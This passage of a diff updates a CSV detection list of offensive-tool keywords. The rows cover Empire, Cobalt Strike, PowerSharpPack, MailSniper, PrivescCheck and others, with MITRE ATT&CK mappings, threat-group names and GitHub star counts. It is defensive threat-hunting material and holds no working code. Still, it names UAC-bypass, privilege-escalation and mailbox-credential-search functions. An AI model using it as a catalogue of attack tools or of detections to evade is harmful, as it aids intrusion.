","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExecuteMSBuild.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ExecuteMSBuild.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1090","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ExploitableLeakedHandlesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Eyewitness*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-FakeLogonScreen*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Farmer*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-EventVwrBypass*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*Invoke-EventVwrBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EventVwrBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ExecuteMSBuild*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExecuteMSBuild.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ExecuteMSBuild.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1090","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ExploitableLeakedHandlesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Eyewitness*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-FakeLogonScreen*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Farmer*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*invokefilefinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-FileFinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Invoke-FileFinder*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-FodHelperBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-FodHelperBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1127","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ForgeUserAgent*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*Invoke-Get-RBCD-Threaded*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Get-RBCD-Threaded*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-GlobalMailSearch*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-GlobalMailSearch*","offensive_tool_keyword","MailSniper","To search all mailboxes in a domain","T1595 T1114 T1590 T1591 T1114","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-GlobalO365MailSearch*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-FileFinder*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-FodHelperBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-FodHelperBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1127","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ForgeUserAgent*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Invoke-Get-RBCD-Threaded*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Get-RBCD-Threaded*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-GlobalMailSearch*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-GlobalMailSearch*","offensive_tool_keyword","MailSniper","To search all mailboxes in a domain","T1595 T1114 T1590 T1591 T1114","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-GlobalO365MailSearch*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-GoFetch*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" -"*Invoke-Gopher*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Gopher*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-GPPPasswordCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-GPPPasswordCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Grouper2*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Grouper2*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Grouper3*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Grouper3*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 